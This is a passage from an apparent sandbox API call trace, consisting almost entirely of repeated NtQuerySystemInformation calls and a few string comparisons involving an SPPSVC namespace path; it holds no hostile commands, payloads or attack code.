ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0269.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0269.688] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7d0, Length=0x28, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0269.713] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7d0, Length=0x28, ResultLength=0x0) [0269.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x28, ResultLength=0x0) [0269.725] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x28, ResultLength=0x0) [0269.725] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x28, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 